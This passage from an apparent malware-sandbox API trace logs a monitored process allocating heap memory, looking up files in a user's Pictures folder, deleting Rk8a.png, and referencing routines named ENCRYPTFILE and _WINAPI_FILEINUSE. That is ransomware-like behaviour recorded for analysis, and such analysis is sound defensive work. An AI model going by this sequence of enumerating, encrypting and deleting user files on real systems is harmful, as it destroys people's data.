(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0090.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0090.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0090.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0090.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0090.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0090.237] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e0f0e0, ftCreationTime.dwHighDateTime=0x1d5e9a3, ftLastAccessTime.dwLowDateTime=0x913d65f0, ftLastAccessTime.dwHighDateTime=0x1d5e47e, ftLastWriteTime.dwLowDateTime=0x913d65f0, ftLastWriteTime.dwHighDateTime=0x1d5e47e, nFileSizeHigh=0x0, nFileSizeLow=0x1744a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Rk8a.png", cAlternateFileName="")) returned 0x41ac200 [0090.237] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rk8a.png")) returned 1 [0090.288] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e0f0e0, ftCreationTime.dwHighDateTime=0x1d5e9a3, ftLastAccessTime.dwLowDateTime=0x913d65f0, ftLastAccessTime.dwHighDateTime=0x1d5e47e, ftLastWriteTime.dwLowDateTime=0x913d65f0, ftLastWriteTime.dwHighDateTime=0x1d5e47e, nFileSizeHigh=0x0, nFileSizeLow=0x1744a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Rk8a.png", cAlternateFileName="")) returned 0 [0090.288] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0090.289] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0090.289] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0090.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0090.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0090.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0090.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0090.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0090.290] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0090.290] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0090.290] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0090.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0090.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0090.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0090.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9908 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0090.291] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0090.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0090.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.291] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0090.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0090.292] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c02b90, ftCreationTime.dwHighDateTime=0x1d5e2ee, ftLastAccessTime.dwLowDateTime=0xa75c3350, ftLastAccessTime.dwHighDateTime=0x1d5e674, ftLastWriteTime.dwLowDateTime=0xa75c3350, ftLastWriteTime.dwHighDateTime=0x1d5e674, nFileSizeHigh=0x0, nFileSizeLow=0x167bc, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="wWIF_SR6x0w3shayx.jpg", cAlternateFileName="WWIF_S~1.JPG")) returned 0x41abfc0 [0090.292] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0090.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0090.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0090.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0090.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0090.293] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0090.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0090.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0090.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0090.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0090.293] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0090.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0090.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0090.294] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0090.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0090.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0090.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2280 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0090.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0090.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0090.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0090.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0090.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0090.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0090.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0090.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0090.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0090.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0090.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0090.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0090.297] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0090.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0090.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0090.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0090.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, 